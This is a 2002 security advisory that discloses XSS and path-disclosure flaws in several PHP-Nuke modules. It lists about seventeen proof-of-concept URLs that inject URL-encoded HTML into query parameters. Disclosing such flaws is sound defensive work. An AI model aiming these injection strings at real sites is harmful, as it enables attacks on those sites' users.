Security Advisory: More Cross site Scripting in PHPNuke

[EN] securityvulns.ru
no-pyccku

Related information
  Crossite scripting in PHPNuke/PostNUKE
  Security bugs in PhpNuke
  PHP-Nuke 5.5 , Phortail 1.2.1 , Avotravis 2.1
  CSS in PHPNuke add-on
  CrossSiteScripting PostNuke.

From: Replugge [Rod] <replugge_(at)_alcoholico.org>
Date: 24.04.2002
Subject: More Cross site Scripting in PHPNuke

Cross site scripting is a serious problem, (even if some people
doesn't believe it), On this second round i'll show 8 new XSS
vulnerabilities in PHP Nuke (most of them are also path disclosure
vulns):

http://nuke/modules.
php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%2
2%3Ch1%3EI%20Love%20XSS%3C/h1%3E
http://nuke/modules.
php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%
20socks%20category%3C/h1%3E&id_subcatg=75
http://nuke/modules.
php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3
Etest%3C/h1%3E
http://nuke/modules.
php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%2
0123%3C/h1%3E
http://nuke/modules.
php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l
=Replugge%20Love%20PHPNuke%20
http://nuke/modules.
php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&
month_l=Replugge
http://nuke/modules.
php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E
http://nuke/modules.
php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3E
Bugger%20You%3C/h1%3E

That in Addition to the 9 i mentioned last week on my posting to
vuln-dev:

http://nuke/modules.
php?name=Downloads&d_op=viewdownload&cid=%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload
http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E
http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=
http://nuke/modules.
php?name=Downloads&d_op=viewdownload&cid=anything_here
http://nuke/modules.
php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%
20Downloads%20with%20virus%20included!!!%3C/h1%3E
http://nuke/modules.
php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1
%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E
http://nuke/modules.
php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECo
oooooooooooool!!!!%3C/h1%3E
http://nuke/modules.
php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%
3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%
20here%3C/h6%3E
http://nuke/modules.
php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%
3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%
22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3
C/h1%3E

I would like to mention that i couldn't find any contact information
on phpnuke's website (without registering as a user).

Best Regards

--
/*
Rodrigo Gutierrez                              +47 73546339
rodrigo@trustix.com                            +47 98060198
Trustix AS                           http://www.trustix.com
*/